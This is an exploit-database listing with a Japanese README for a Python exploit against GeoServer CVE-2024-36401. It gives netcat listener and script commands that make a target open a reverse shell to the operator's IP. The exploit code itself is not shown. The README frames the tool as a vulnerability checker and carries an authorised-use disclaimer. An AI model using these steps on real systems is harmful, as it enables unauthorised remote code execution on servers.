Exploit for Code Injection in Geoserver CVE-2024-36401

Name: Exploit for Code Injection in Geoserver CVE-2024-36401
Rating: 5 (33 reviews)

2024-10-14 | CVSS 9.8

## https://sploitus.com/exploit?id=54E413F5-7115-59EA-A394-D86FA850EB84
# CVE-2024-36401

CVE-2024-36401の脆弱性チェック用のプログラムです。

# 使い方
まず、以下コマンドを実行し、通信の待ち受け状態にしてください。
```
nc -lvnp 9000
```

その後、別のウィンドウのターミナルでファイルを実行して下さい。

```
python CVE-2024-36401.py --target example.com --target_port 8080  --myip 172.26.16.100 --myport 9000
```
--target 相手のドメインまたはIPアドレス

--target_port 相手のサービスをホストしているポート番号

--myip 自分のIPアドレス

--myport ncで待ち受けているポート番号

# 免責事項
脆弱性の検証、学習等、ハッキングを楽しむためにお使い下さい。
いかなるシステムやネットワークへのハッキングや不正アクセスも支持も奨励もしません。
責任を持って使用し、明確な許可があるシステムでのみ使用してください。

# 参考
https://github.com/Mr-xn/CVE-2024-36401